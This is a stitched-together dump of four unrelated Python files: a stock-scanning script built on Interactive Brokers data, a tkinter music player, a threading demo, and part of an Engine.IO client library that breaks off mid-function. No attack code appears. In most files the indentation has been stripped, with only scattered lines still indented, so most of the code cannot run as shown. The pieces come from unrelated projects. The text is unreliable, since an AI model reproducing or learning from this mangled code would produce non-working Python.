algo_main.py
|
from tps import common, ohlc_file
import os, sys, re, time
import pandas
import datetime
#from collections import OrderedDict
from ib_quote import IbQuote
from tabulate import tabulate  # used by run_model's table dump below
import matplotlib.pyplot as plt
g_fdrcfg = {
"type": "normal",
"name": "ib1d",
"start": "",
"end": "",
"path": "./cache/"
}
algo_inx_dct = {}
g_ohlc_dct = {}
g_rule={}
g_symbol_df=pandas.DataFrame()
g_algo_list=[]
g_fdr_name = ''
class AlgoInfo:
def __init__(self, filename, param, _feeder):
self.name = filename
self.param = param
self.file = filename
self.fdr = FeederInfo(_feeder)
pass
class FeederInfo:
def __init__(self, name):
self.name = name
self.start_time = None
self.end_time = None
pass
def __get_algo_instance(algo_info):
algo_file = algo_info.file
algo_param = algo_info.param
if algo_file not in algo_inx_dct:
mod = __import__('algo.'+algo_file, globals(), locals(), [algo_file])
if hasattr(mod, 'algo_init'):
algo_inx = mod.algo_init(algo_param)
algo_inx_dct[algo_file] = algo_inx
return algo_inx
return algo_inx_dct[algo_file]
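# Expected algo module interface, inferred from the calls above and in
# __strategy_run_algo/__strategy_post_algo below (method names are exactly
# what this file invokes; the module itself lives under algo/):
#
#   def algo_init(param):                 # returns an algo instance
#       ...
#   class SomeAlgo:
#       def run_algo(self, ohlc): ...     # per-symbol indicators -> dict
#       def post_algo(self, df, ohlc_dct): ...  # table-level pass -> df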
def __init_algo_inx(algo_list):
"""
init each algo module once
"""
for agIn in algo_list:
agIn.inx = __get_algo_instance(agIn)
def __print_df(df):
#print(tabulate(df, tablefmt="pipe", headers="keys",showindex=False))
print('========================================================')
print('= total', len(df), 'selected')
print('========================================================')
print(df)
# ========================================================
def __strategy_init_ohlc():
__init_algo_inx(g_algo_list)
df = g_symbol_df
# use the first algo's feeder
#fdr = g_algo_list[0].fdr
    # g_fdrcfg is (re)assigned here, so declare it global; otherwise reading
    # it below would raise UnboundLocalError when the rule has no 'feeder'
    global g_fdrcfg
    if 'feeder' in g_rule:
        g_fdrcfg = g_rule['feeder']
for index, row in df.iterrows():
symbol = row['symbol']
if symbol not in g_ohlc_dct:
ohlc = ohlc_file.OhlcFile.get_ohlc(g_fdrcfg['path'],row, g_fdr_name)
g_ohlc_dct[symbol] = ohlc
if ohlc.empty:
print(symbol, "ohlc is empty")
continue
#print(ohlc)
#print(g_ohlc_dct)
pass
def __strategy_run_algo(df):
last_date = ''
for algo_info in g_algo_list:
fdr = algo_info.fdr
algo_name = algo_info.name
algo_file = algo_info.file
algo_inx = algo_info.inx
algo_param = algo_info.param
#ohlc_dct = algo_info.ohlc_dct
print("run algo:", algo_name, ",feeder:", fdr.name, ",param:", algo_param)
for index, row in df.iterrows():
symbol = row['symbol']
ohlc = g_ohlc_dct[symbol]
if ohlc.empty:
print(symbol, "ohlc is empty")
continue
print("processing", symbol)
#print(ohlc)
#ind_dct = algo_inx.run_algo(g_ohlc_dct[symbol])
            ind_dct = algo_inx.run_algo(ohlc) or {}
            # record the latest close alongside the algo's indicators
            ind_dct['px'] = ohlc['Close'].iloc[-1]
            for cn in ind_dct:
                df.loc[index, cn] = ind_dct[cn]
#print(ohlc)
if not last_date:
last_date = ohlc['Date'].iloc[-1]
df = __strategy_post_algo(df)
"""
select columns
"""
#print(g_rule)
if 'columns' in g_rule:
output_cols = g_rule['columns']
if not output_cols:
output_cols.extend(df.columns.values)
df = df[output_cols]
else:
output_cols = df.columns.values
df = df[output_cols]
ret = {}
ret['raw'] = df
#__print_df(df)
print("======= SCAN ===================================")
df = __strategy_scan(df)
__print_df(df)
ret['scan']=df
#print(ohlc)
# TODO ohlc.to_csv(r'ohlc.csv')
print("last date is", last_date)
run_model(df)
return ret
'''
from matplotlib import style
def plot_ohlc(ohlc):
ax = plt.gca()
ohlc.plot(ax=ax, kind='line')
plt.show()
'''
# deep learning, TODO
def run_model(df_algo):
if 'model' in g_rule:
models = g_rule['model']
else:
return
print("======= RUNNING MODEL===================================")
this_model = models[0]
model_file = this_model["name"]
mod = __import__('model.'+model_file, globals(), locals(), [model_file])
model_entry = mod.model
df_model = g_symbol_df.copy()[["symbol"]]
    # symbols whose prediction frames should be printed and plotted; default
    # to an empty set so the membership test below cannot hit a NameError
    symbol_set = set(this_model.get('ohlc_output', []))
for index, row in df_model.iterrows():
symbol = row['symbol']
ohlc = g_ohlc_dct[symbol]
#print('model=',id(ohlc))
# Drop missing value
#ohlc.fillna(value=-99999, inplace=True)
#ohlc.is_copy = None
        df1 = ohlc[['Date']+this_model["input_cols"]].copy()
df1.dropna(inplace=True)
#print('==---------*****************^%%%%%%%%%%%%%++++++++++++++++')
ind_dct,dfpred = model_entry(symbol,df1,this_model)
#print(ohlc[-100:])
g_ohlc_dct[symbol] = ohlc
ind_dct['px'] = ohlc['Close'].iloc[-1]
if ind_dct:
for cn in ind_dct:
df_model.loc[index, cn] = ind_dct[cn]
if dfpred is not None and symbol in symbol_set:
print('========================= PREDICTION =========================================')
print(dfpred)
ax = plt.gca()
dfpred.plot(ax=ax, kind='line')
#plot_ohlc(dfpred)
#thread1 = threading.Thread(target = plot_ohlc, args = (dfpred,))
#thread1.start()
if hasattr(mod, 'model_post'):
mod.model_post(df_algo)
# sort
    if 'sort' in this_model:
        sort_list = this_model['sort']
if sort_list:
sort_cols=[]
asc_list=[]
for dct in sort_list:
for key,value in dct.items():
sort_cols.append(key)
asc_list.append(False if value=="False" else True)
df_model.sort_values(by=sort_cols, inplace=True, ascending=asc_list)
pass
print(tabulate(df_model, tablefmt="pipe", headers="keys",showindex=False))
print(df_model.describe())
plt.show()
#print(df)
def __strategy_post_algo(df):
for algo_info in g_algo_list:
fdr = algo_info.fdr
algo_name = algo_info.name
algo_file = algo_info.file
algo_inx = algo_info.inx
algo_param = algo_info.param
#ohlc_dct = algo_info.ohlc_dct
print("run post algo:", algo_name, ",feeder:", fdr.name, ",param:", algo_param)
df = algo_inx.post_algo(df, g_ohlc_dct)
return df
# scan and pick columns
def __strategy_scan(df):
if 'criteria' in g_rule:
criteria = g_rule['criteria']
else:
criteria = []
collst = []
if not criteria:
print("criteria is empty,...take the original table")
else:
# filter by dynamic criteria string
crstr = ""
pattern1 = "([a-zA-Z][A-Za-z0-9-_]*)"
pattern2 = "[></]"
for cr in criteria:
print("processing cr", cr)
if cr[0] == '@': # TODO handle parameter
continue
collst = re.findall(pattern1, cr) # find all related columns
ration = re.findall(pattern2, cr)
if len(ration) != 0:
cr0 = re.sub(pattern1, r"df['\1']", cr) # put df[] surround pattern / substitute
if crstr == "": # first criteria
crstr = crstr + "(" + cr0 + ") "
else:
crstr = crstr + "& (" + cr0 + ") "
print("\tto evaluate criteria(logical) = %s" % crstr)
if crstr != "":
df = df[eval(crstr)]
# ===========================================================
#print(g_rule)
if 'columns' in g_rule:
output_cols = g_rule['columns']
if not output_cols:
output_cols.extend(df.columns.values)
#print('===========================================',output_set)
for col in collst:
if col not in output_cols: # keep origin order
output_cols.append(col)
df = df[output_cols]
if 'sort' in g_rule:
sort_list = g_rule['sort']
if sort_list:
sort_cols=[]
asc_list=[]
for dct in sort_list:
for key,value in dct.items():
sort_cols.append(key)
asc_list.append(False if value=="False" else True)
df.sort_values(by=sort_cols, inplace=True, ascending=asc_list)
pass
return df
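# Example of the criteria rewriting above (hypothetical column names):
# a rule entry such as "rsi > 70" is rewritten by pattern1 into
# "df['rsi'] > 70", several entries are AND-ed together, and the combined
# string is evaluated against the DataFrame:
#
#   criteria: ["rsi > 70", "px < 100"]
#   crstr:    "(df['rsi'] > 70) & (df['px'] < 100) "
#   df = df[eval(crstr)]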
def __merge_rt(rt_ohlc_dct):
    # merge today's realtime quotes into each cached history; assumes
    # rt_ohlc_dct maps symbol -> dict with today's OHLCV values
    for symbol, ohlc in g_ohlc_dct.items():
        if symbol not in rt_ohlc_dct:
            continue
        ohlc_today = rt_ohlc_dct[symbol]
        ts = ohlc.index[-1].to_pydatetime()
        newt = ts + datetime.timedelta(days=1)  # timestamp for today's bar
        ohlc.loc[newt] = {
            'Open': ohlc_today['Open'],
            'Close': ohlc_today['Close'],
            'High': ohlc_today['High'],
            'Low': ohlc_today['Low'],
            'Volume': ohlc_today['Volume'],
            'Adj Close': ohlc_today['Close']
        }
"""
scan routine, strategy is algo_list which is consist of many algo,
this function will run each algo then merge their result into one table.
"""
def run_strategy():
df = g_symbol_df.copy()
print('run_strategy',df)
__strategy_init_ohlc()
# parse feeder -----------------------------
fdrcfg = {'type':'normal'}
#print(g_rule)
if 'feeder' in g_rule:
fdrcfg = g_rule['feeder']
if fdrcfg['type']=='realtime':
ibquote = IbQuote()
ibquote.get_quote_batch(g_symbol_df)
while True:
if not ibquote.ready():
time.sleep(5)
continue
            else:  # merge historical and live data, then re-run the scan
                __merge_rt(ibquote.ohlc_dct)
                __strategy_run_algo(df)
                time.sleep(5)  # throttle the realtime re-scan loop
else: #not realtime
return __strategy_run_algo(df)
pass
"""
import argparse
# help flag provides flag help
# store_true actions stores argument as True
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--file', type=str, default='./config/trend.json', help="config file")
args = parser.parse_args()
"""
def get_feeder_name():
if 'feeder' in g_rule and 'name' in g_rule['feeder']:
fdrname = g_rule['feeder']['name'].upper()
else:
fdrname = 'IB1D'
if fdrname in ['IB1D','IB1H','IB1D5Y']:
return fdrname
else:
return 'IB1D'
def main(rule,symbolfn='./symbol_ib.txt'):
global g_symbol_df,g_rule,g_fdr_name
g_rule = rule
g_symbol_df = common.load_symbol_csv(symbolfn)
#feeder = 'IB1D'
g_fdr_name = get_feeder_name()
for algo_dct in g_rule['algo']:
#param is dict
#algo_param = dict.fromkeys(dct['param'], 1)
g_algo_list.append(AlgoInfo(algo_dct['name'],algo_dct['param'],g_fdr_name))
if not g_symbol_df.empty:
return run_strategy()
else:
print("usage: prog -f symbol_file -s symbol_lst -a algo -p algo_param -d feeder")
return {}
pass
#main(None)
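# Example invocation (hypothetical rule; the key names mirror the ones read
# above: 'feeder', 'algo', 'criteria', 'columns', 'sort', 'model'):
#
#   main({
#       "feeder": {"type": "normal", "name": "ib1d", "path": "./cache/"},
#       "algo": [{"name": "my_algo", "param": {"period": 14}}],
#       "criteria": ["rsi > 70"],
#       "columns": [],
#       "sort": [{"px": "False"}],
#   }, symbolfn='./symbol_ib.txt')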
|
main.py
|
import os
from tkinter import *
import tkinter.messagebox
from tkinter import filedialog
import time
import threading
from tkinter import ttk
from ttkthemes import themed_tk as tk
from pygame import mixer
from mutagen.mp3 import MP3
root = tk.ThemedTk()
root.get_themes()
root.set_theme("radiance")
# Menubar
menubar = Menu(root)
root.config(menu=menubar)
# The sub-menu
submenu = Menu(menubar, tearoff=0)
root.title("Juke Box")
root.iconbitmap(r'images/melody.ico')
# root.geometry('400x400')
# Status bar
statusbar = ttk.Label(root, text="Welcome to Juke Box", relief=SUNKEN, anchor=W, font='Times 12 bold')
statusbar.pack(side=BOTTOM, fill=X)
leftframe = Frame(root)
leftframe.pack(side=LEFT, padx=20)
playlistbox = Listbox(leftframe)
playlistbox.pack()
playlist = [] # Array that contains full path + filename
def browse_file():
global filename_path
filename_path = filedialog.askopenfilename()
add_to_playlist(filename_path)
def add_to_playlist(filename):
    playlist.insert(0, filename)  # keep the full path for playback
    playlistbox.insert(0, os.path.basename(filename))  # display only the name
addBtn = ttk.Button(leftframe, text=' + Add', command=browse_file)
addBtn.pack(side=LEFT)
def del_song():
try:
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0]) # Type-casting to int, otherwise it returns a tuple
playlistbox.delete(selected_song)
playlist.pop(selected_song)
except:
tkinter.messagebox.showerror('Juke Box', "Please select a song & then press -Del")
delBtn = ttk.Button(leftframe, text=' - Del', command=del_song)
delBtn.pack(side=LEFT)
rightframe = Frame(root)
rightframe.pack()
topframe = Frame(rightframe)
topframe.pack()
lengthlabel = ttk.Label(topframe, text="Total Time : --:--")
lengthlabel.pack(pady=5)
currenttimelabel = ttk.Label(topframe, text="Current Time : --:--", relief=GROOVE)
currenttimelabel.pack(pady=5)
paused = FALSE  # playback state; must exist before play_music() first reads it
mixer.init()  # initializing the mixer
menubar.add_cascade(label="File", menu=submenu)
submenu.add_command(label="Open", command=browse_file)
submenu.add_command(label="Exit", command=root.destroy)
def about_us():
tkinter.messagebox.showinfo('About Juke Box',
"Our very own Music Player \nSupports .mp3 and .wav files \nCopyright @gauravsarkar97")
submenu = Menu(menubar, tearoff=0)
menubar.add_cascade(label="Help", menu=submenu)
submenu.add_command(label="About Us", command=about_us)
def show_details(play_song):
file_data = os.path.splitext(play_song)
if file_data[1] == '.mp3':
audio = MP3(play_song)
total_length = audio.info.length
else:
a = mixer.Sound(play_song)
total_length = a.get_length()
min, sec = divmod(total_length, 60)
min = round(min)
sec = round(sec)
timeformat = '{:02d}:{:02d}'.format(min, sec)
lengthlabel['text'] = "Total Length : " + timeformat
t1 = threading.Thread(target=start_count, args=(total_length,))
t1.start()
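# start_count (below) runs on the worker thread launched above: it ticks once
# per second while the mixer reports music playing, and holds the countdown
# whenever the global paused flag is set.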
def start_count(t):
global paused
while t and mixer.music.get_busy():
        if paused:
            time.sleep(1)  # hold the countdown without busy-waiting
            continue
else:
min, sec = divmod(t, 60)
min = round(min)
sec = round(sec)
timeformat = '{:02d}:{:02d}'.format(min, sec)
currenttimelabel['text'] = "Current Time : " + timeformat
time.sleep(1)
t -= 1
def play_music():
global paused
if paused:
mixer.music.unpause()
statusbar['text'] = "Music Resumed"
paused = FALSE
else:
try:
stop_music()
time.sleep(1)
selected_song = playlistbox.curselection()
selected_song = int(selected_song[0]) # Type-casting to int, otherwise it returns a tuple
play_it = playlist[selected_song] # Getting the full path of the selected song
mixer.music.load(play_it)
mixer.music.play()
statusbar['text'] = "Playing Music : " + os.path.basename(play_it)
show_details(play_it)
except:
tkinter.messagebox.showerror('Juke Box', "No song(s) selected.\nPlease Open & select songs")
def stop_music():
    global paused
    mixer.music.stop()
    statusbar['text'] = "Music Stopped"
    paused = FALSE
def pause_music():
global paused
paused = TRUE
mixer.music.pause()
statusbar['text'] = "Music Paused"
def rewind_music():
play_music()
statusbar['text'] = "Music Rewinded"
def set_vol(val):
volume = float(val) / 100
mixer.music.set_volume(volume)
muted = FALSE
def mute_music(): # Mute & Unmute Functionality
global muted
if muted:
muted = FALSE
volumeBtn.configure(image=volumePhoto)
mixer.music.set_volume(0.5)
scale.set(50)
statusbar['text'] = "Music Unmuted"
else:
muted = TRUE
volumeBtn.configure(image=mutePhoto)
mixer.music.set_volume(0)
scale.set(0)
statusbar['text'] = "Music Muted"
# Adding a middle frame
middleframe = Frame(rightframe)
middleframe.pack(pady=20, padx=5)
# Buttons
playPhoto = PhotoImage(file='images/play.png')
playBtn = ttk.Button(middleframe, image=playPhoto, command=play_music) # play button
playBtn.grid(row=0, column=0, padx=10)
pausePhoto = PhotoImage(file='images/pause.png')
pauseBtn = ttk.Button(middleframe, image=pausePhoto, command=pause_music) # pause button
pauseBtn.grid(row=0, column=1, padx=10)
stopPhoto = PhotoImage(file='images/stop.png')
stopBtn = ttk.Button(middleframe, image=stopPhoto, command=stop_music) # stop button
stopBtn.grid(row=0, column=2, padx=10)
# Adding a bottom frame
bottomframe = Frame(rightframe)
bottomframe.pack(pady=30, padx=30)
rewindPhoto = PhotoImage(file='images/rewind.png')
rewindBtn = ttk.Button(bottomframe, image=rewindPhoto, command=rewind_music) # Rewind button
rewindBtn.grid(row=0, column=0, pady=10)
volumePhoto = PhotoImage(file='images/speaker.png')
mutePhoto = PhotoImage(file='images/mute.png')
volumeBtn = ttk.Button(bottomframe, image=volumePhoto, command=mute_music)  # Mute/volume button
volumeBtn.grid(row=0, column=1, pady=10, padx=30)
# Volume Scale
scale = ttk.Scale(bottomframe, from_=0, to_=100, orient=HORIZONTAL, command=set_vol)
scale.set(50) # setting default value
mixer.music.set_volume(0.5)
scale.grid(row=0, column=2, pady=10)
def on_closing():
stop_music()
root.destroy()
root.protocol("WM_DELETE_WINDOW", on_closing) # Override close button
root.mainloop()
|
multithread_demo.py
|
__filename__ = 'multithread_demo.py'
__author__ = 'jwestover@sonobi.com'
import threading
import time
import random
class HelloWorld(object):
def __init__(self):
self.my_number = 1
self.lock = threading.Lock()
def thread_target1(self, parameter = None):
if parameter:
            print('{0} this parameter has been passed'.format(str(parameter)))
            try:
                time.sleep(parameter)
                print('Wake up time')
            except:
                #who cares
                pass
        else:
            print('hello world.... this is stupid')
return 'More stupid stuff'
def thread_target2(self, parameter = None):
time.sleep(.1*random.randint(0,10))
self.my_number += 1
time.sleep(float(parameter))
self.my_number += 1
        print(self.my_number)
def thread_target3(self, parameter = None):
time.sleep(.1*random.randint(0,10))
self.lock.acquire()
self.my_number += 1
self.lock.release()
time.sleep(float(parameter))
self.lock.acquire()
self.my_number += 1
self.lock.release()
        print(self.my_number)
def demo1(self):
for i in range(10):
            this_thread = threading.Thread(target = self.thread_target1, args = (i,)).start()
            print('Thread count: {0}'.format(threading.active_count()))
            # Thread.start() returns None, so this prints None, not the thread object
            print(this_thread)
def demo2(self):
for i in range(10):
this_thread = threading.Thread(target = self.thread_target1, args = (i,))
this_thread.daemon = True
this_thread.start()
            print('Thread count: {0}'.format(threading.active_count()))
time.sleep(60)
def demo3(self):
for i in range(10):
this_thread = threading.Thread(target = self.thread_target2, args = (i,))
this_thread.daemon = False
this_thread.start()
            print('Thread count: {0} My Number: {1}'.format(threading.active_count(), self.my_number))
def demo4(self):
for i in range(10):
this_thread = threading.Thread(target = self.thread_target3, args = (i,))
this_thread.daemon = False
this_thread.start()
            print('Thread count: {0} My Number: {1}'.format(threading.active_count(), self.my_number))
test = HelloWorld()
#test.demo1()
#test.demo2()
#test.demo3()
#test.demo4()
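# What each demo illustrates:
#   demo1 - fire-and-forget threads; Thread.start() returns None, so the
#           printed handle is None
#   demo2 - daemon threads; the trailing sleep(60) keeps the main thread
#           alive so the daemons can finish (daemons die with the program)
#   demo3 - unsynchronized increments of my_number from several threads can
#           interleave (a race condition)
#   demo4 - the same increments guarded by threading.Lock, giving a
#           deterministic final count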
|
client.py
|
from base64 import b64encode
from engineio.json import JSONDecodeError
import logging
import queue
import signal
import ssl
import threading
import time
import urllib
try:
import requests
except ImportError: # pragma: no cover
requests = None
try:
import websocket
except ImportError: # pragma: no cover
websocket = None
from . import exceptions
from . import packet
from . import payload
default_logger = logging.getLogger('engineio.client')
connected_clients = []
def signal_handler(sig, frame):
"""SIGINT handler.
Disconnect all active clients and then invoke the original signal handler.
"""
for client in connected_clients[:]:
if not client.is_asyncio_based():
client.disconnect()
if callable(original_signal_handler):
return original_signal_handler(sig, frame)
else: # pragma: no cover
# Handle case where no original SIGINT handler was present.
return signal.default_int_handler(sig, frame)
original_signal_handler = None
class Client(object):
"""An Engine.IO client.
This class implements a fully compliant Engine.IO web client with support
for websocket and long-polling transports.
:param logger: To enable logging set to ``True`` or pass a logger object to
use. To disable logging set to ``False``. The default is
``False``. Note that fatal errors are logged even when
``logger`` is ``False``.
:param json: An alternative json module to use for encoding and decoding
packets. Custom json modules must have ``dumps`` and ``loads``
functions that are compatible with the standard library
versions.
:param request_timeout: A timeout in seconds for requests. The default is
5 seconds.
:param http_session: an initialized ``requests.Session`` object to be used
when sending requests to the server. Use it if you
need to add special client options such as proxy
servers, SSL certificates, custom CA bundle, etc.
:param ssl_verify: ``True`` to verify SSL certificates, or ``False`` to
skip SSL certificate verification, allowing
connections to servers with self signed certificates.
The default is ``True``.
"""
event_names = ['connect', 'disconnect', 'message']
def __init__(self,
logger=False,
json=None,
request_timeout=5,
http_session=None,
ssl_verify=True):
global original_signal_handler
if original_signal_handler is None and \
threading.current_thread() == threading.main_thread():
original_signal_handler = signal.signal(signal.SIGINT,
signal_handler)
self.handlers = {}
self.base_url = None
self.transports = None
self.current_transport = None
self.sid = None
self.upgrades = None
self.ping_interval = None
self.ping_timeout = None
self.http = http_session
self.ws = None
self.read_loop_task = None
self.write_loop_task = None
self.queue = None
self.state = 'disconnected'
self.ssl_verify = ssl_verify
if json is not None:
packet.Packet.json = json
if not isinstance(logger, bool):
self.logger = logger
else:
self.logger = default_logger
if self.logger.level == logging.NOTSET:
if logger:
self.logger.setLevel(logging.INFO)
else:
self.logger.setLevel(logging.ERROR)
self.logger.addHandler(logging.StreamHandler())
self.request_timeout = request_timeout
def is_asyncio_based(self):
return False
def on(self, event, handler=None):
"""Register an event handler.
:param event: The event name. Can be ``'connect'``, ``'message'`` or
``'disconnect'``.
:param handler: The function that should be invoked to handle the
event. When this parameter is not given, the method
acts as a decorator for the handler function.
Example usage::
# as a decorator:
@eio.on('connect')
def connect_handler():
print('Connection request')
# as a method:
def message_handler(msg):
print('Received message: ', msg)
eio.send('response')
eio.on('message', message_handler)
"""
if event not in self.event_names:
raise ValueError('Invalid event')
def set_handler(handler):
self.handlers[event] = handler
return handler
if handler is None:
return set_handler
set_handler(handler)
def connect(self, url, headers=None, transports=None,
engineio_path='engine.io'):
"""Connect to an Engine.IO server.
:param url: The URL of the Engine.IO server. It can include custom
query string parameters if required by the server.
:param headers: A dictionary with custom headers to send with the
connection request.
:param transports: The list of allowed transports. Valid transports
are ``'polling'`` and ``'websocket'``. If not
given, the polling transport is connected first,
then an upgrade to websocket is attempted.
:param engineio_path: The endpoint where the Engine.IO server is
installed. The default value is appropriate for
most cases.
Example usage::
eio = engineio.Client()
eio.connect('http://localhost:5000')
"""
if self.state != 'disconnected':
raise ValueError('Client is not in a disconnected state')
valid_transports = ['polling', 'websocket']
if transports is not None:
if isinstance(transports, str):
transports = [transports]
transports = [transport for transport in transports
if transport in valid_transports]
if not transports:
raise ValueError('No valid transports provided')
self.transports = transports or valid_transports
self.queue = self.create_queue()
return getattr(self, '_connect_' + self.transports[0])(
url, headers or {}, engineio_path)
def wait(self):
"""Wait until the connection with the server ends.
Client applications can use this function to block the main thread
during the life of the connection.
"""
if self.read_loop_task:
self.read_loop_task.join()
def send(self, data):
"""Send a message to a client.
:param data: The data to send to the client. Data can be of type
``str``, ``bytes``, ``list`` or ``dict``. If a ``list``
or ``dict``, the data will be serialized as JSON.
"""
self._send_packet(packet.Packet(packet.MESSAGE, data=data))
def disconnect(self, abort=False):
"""Disconnect from the server.
:param abort: If set to ``True``, do not wait for background tasks
associated with the connection to end.
"""
if self.state == 'connected':
self._send_packet(packet.Packet(packet.CLOSE))
self.queue.put(None)
self.state = 'disconnecting'
self._trigger_event('disconnect', run_async=False)
if self.current_transport == 'websocket':
self.ws.close()
if not abort:
self.read_loop_task.join()
self.state = 'disconnected'
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
def transport(self):
"""Return the name of the transport currently in use.
The possible values returned by this function are ``'polling'`` and
``'websocket'``.
"""
return self.current_transport
def start_background_task(self, target, *args, **kwargs):
"""Start a background task.
This is a utility function that applications can use to start a
background task.
:param target: the target function to execute.
:param args: arguments to pass to the function.
:param kwargs: keyword arguments to pass to the function.
This function returns an object that represents the background task,
on which the ``join()`` method can be invoked to wait for the task to
complete.
"""
th = threading.Thread(target=target, args=args, kwargs=kwargs)
th.start()
return th
def sleep(self, seconds=0):
"""Sleep for the requested amount of time."""
return time.sleep(seconds)
def create_queue(self, *args, **kwargs):
"""Create a queue object."""
q = queue.Queue(*args, **kwargs)
q.Empty = queue.Empty
return q
def create_event(self, *args, **kwargs):
"""Create an event object."""
return threading.Event(*args, **kwargs)
def _reset(self):
self.state = 'disconnected'
self.sid = None
def _connect_polling(self, url, headers, engineio_path):
"""Establish a long-polling connection to the Engine.IO server."""
if requests is None: # pragma: no cover
# not installed
self.logger.error('requests package is not installed -- cannot '
'send HTTP requests!')
return
self.base_url = self._get_engineio_url(url, engineio_path, 'polling')
self.logger.info('Attempting polling connection to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(), headers=headers,
timeout=self.request_timeout)
if r is None or isinstance(r, str):
self._reset()
raise exceptions.ConnectionError(
r or 'Connection refused by the server')
if r.status_code < 200 or r.status_code >= 300:
self._reset()
try:
arg = r.json()
except JSONDecodeError:
arg = None
raise exceptions.ConnectionError(
'Unexpected status code {} in server response'.format(
r.status_code), arg)
try:
p = payload.Payload(encoded_payload=r.content.decode('utf-8'))
except ValueError:
raise exceptions.ConnectionError(
'Unexpected response from server') from None
open_packet = p.packets[0]
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError(
'OPEN packet not returned by server')
self.logger.info(
'Polling connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = int(open_packet.data['pingInterval']) / 1000.0
self.ping_timeout = int(open_packet.data['pingTimeout']) / 1000.0
self.current_transport = 'polling'
self.base_url += '&sid=' + self.sid
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
for pkt in p.packets[1:]:
self._receive_packet(pkt)
if 'websocket' in self.upgrades and 'websocket' in self.transports:
# attempt to upgrade to websocket
if self._connect_websocket(url, headers, engineio_path):
# upgrade to websocket succeeded, we're done here
return
# start background tasks associated with this client
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_polling)
def _connect_websocket(self, url, headers, engineio_path):
"""Establish or upgrade to a WebSocket connection with the server."""
if websocket is None: # pragma: no cover
# not installed
self.logger.error('websocket-client package not installed, only '
'polling transport is available')
return False
websocket_url = self._get_engineio_url(url, engineio_path, 'websocket')
if self.sid:
self.logger.info(
'Attempting WebSocket upgrade to ' + websocket_url)
upgrade = True
websocket_url += '&sid=' + self.sid
else:
upgrade = False
self.base_url = websocket_url
self.logger.info(
'Attempting WebSocket connection to ' + websocket_url)
# get cookies and other settings from the long-polling connection
# so that they are preserved when connecting to the WebSocket route
cookies = None
extra_options = {}
if self.http:
# cookies
cookies = '; '.join(["{}={}".format(cookie.name, cookie.value)
for cookie in self.http.cookies])
for header, value in headers.items():
if header.lower() == 'cookie':
if cookies:
cookies += '; '
cookies += value
del headers[header]
break
# auth
if 'Authorization' not in headers and self.http.auth is not None:
if not isinstance(self.http.auth, tuple): # pragma: no cover
raise ValueError('Only basic authentication is supported')
basic_auth = '{}:{}'.format(
self.http.auth[0], self.http.auth[1]).encode('utf-8')
basic_auth = b64encode(basic_auth).decode('utf-8')
headers['Authorization'] = 'Basic ' + basic_auth
# cert
# this can be given as ('certfile', 'keyfile') or just 'certfile'
if isinstance(self.http.cert, tuple):
extra_options['sslopt'] = {
'certfile': self.http.cert[0],
'keyfile': self.http.cert[1]}
elif self.http.cert:
extra_options['sslopt'] = {'certfile': self.http.cert}
# proxies
if self.http.proxies:
proxy_url = None
if websocket_url.startswith('ws://'):
proxy_url = self.http.proxies.get(
'ws', self.http.proxies.get('http'))
else: # wss://
proxy_url = self.http.proxies.get(
'wss', self.http.proxies.get('https'))
if proxy_url:
parsed_url = urllib.parse.urlparse(
proxy_url if '://' in proxy_url
else 'scheme://' + proxy_url)
extra_options['http_proxy_host'] = parsed_url.hostname
extra_options['http_proxy_port'] = parsed_url.port
extra_options['http_proxy_auth'] = (
(parsed_url.username, parsed_url.password)
if parsed_url.username or parsed_url.password
else None)
# verify
if isinstance(self.http.verify, str):
if 'sslopt' in extra_options:
extra_options['sslopt']['ca_certs'] = self.http.verify
else:
extra_options['sslopt'] = {'ca_certs': self.http.verify}
elif not self.http.verify:
self.ssl_verify = False
if not self.ssl_verify:
extra_options['sslopt'] = {"cert_reqs": ssl.CERT_NONE}
try:
ws = websocket.create_connection(
websocket_url + self._get_url_timestamp(), header=headers,
cookie=cookies, enable_multithread=True, **extra_options)
except (ConnectionError, IOError, websocket.WebSocketException):
if upgrade:
self.logger.warning(
'WebSocket upgrade failed: connection error')
return False
else:
raise exceptions.ConnectionError('Connection error')
if upgrade:
p = packet.Packet(packet.PING, data='probe').encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
try:
p = ws.recv()
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected recv exception: %s',
str(e))
return False
pkt = packet.Packet(encoded_packet=p)
if pkt.packet_type != packet.PONG or pkt.data != 'probe':
self.logger.warning(
'WebSocket upgrade failed: no PONG packet')
return False
p = packet.Packet(packet.UPGRADE).encode()
try:
ws.send(p)
except Exception as e: # pragma: no cover
self.logger.warning(
'WebSocket upgrade failed: unexpected send exception: %s',
str(e))
return False
self.current_transport = 'websocket'
self.logger.info('WebSocket upgrade was successful')
else:
try:
p = ws.recv()
except Exception as e: # pragma: no cover
raise exceptions.ConnectionError(
'Unexpected recv exception: ' + str(e))
open_packet = packet.Packet(encoded_packet=p)
if open_packet.packet_type != packet.OPEN:
raise exceptions.ConnectionError('no OPEN packet')
self.logger.info(
'WebSocket connection accepted with ' + str(open_packet.data))
self.sid = open_packet.data['sid']
self.upgrades = open_packet.data['upgrades']
self.ping_interval = int(open_packet.data['pingInterval']) / 1000.0
self.ping_timeout = int(open_packet.data['pingTimeout']) / 1000.0
self.current_transport = 'websocket'
self.state = 'connected'
connected_clients.append(self)
self._trigger_event('connect', run_async=False)
self.ws = ws
self.ws.settimeout(self.ping_interval + self.ping_timeout)
# start background tasks associated with this client
self.write_loop_task = self.start_background_task(self._write_loop)
self.read_loop_task = self.start_background_task(
self._read_loop_websocket)
return True
def _receive_packet(self, pkt):
"""Handle incoming packets from the server."""
packet_name = packet.packet_names[pkt.packet_type] \
if pkt.packet_type < len(packet.packet_names) else 'UNKNOWN'
self.logger.info(
'Received packet %s data %s', packet_name,
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
if pkt.packet_type == packet.MESSAGE:
self._trigger_event('message', pkt.data, run_async=True)
elif pkt.packet_type == packet.PING:
